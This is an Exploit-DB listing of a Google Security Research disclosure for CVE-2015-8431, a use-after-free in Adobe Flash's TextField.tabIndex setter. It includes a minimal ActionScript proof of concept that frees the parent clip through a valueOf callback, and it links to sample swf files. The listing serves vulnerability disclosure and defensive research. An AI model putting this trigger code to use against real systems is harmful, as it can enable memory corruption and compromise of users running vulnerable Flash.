Adobe Flash TextField.tabIndex Setter - Use-After-Free

EDB-ID:

39054

CVE:

2015-8431

EDB Verified:

Author:

Google Security Research

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2015-12-18

Vulnerable App: 
Source: https://code.google.com/p/google-security-research/issues/detail?id=574

There is a use-after-free in the TextField.tabIndex setter. If the integer parameter is an object with valueOf defined, then it can free the TextField's parent, leading to a use-after-free. A minimal PoC follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 1);
var tf = mc.createTextField("tf", 2, 1, 1, 100, 100);
tf.text = "hello";
tf.tabIndex = {valueOf : func};

function func(){
	if(times == 0){
		times++;
		return;
        }
	mc.removeMovieClip();
	
        // Fix heap here

	return 0x77777777;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39054.zip
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services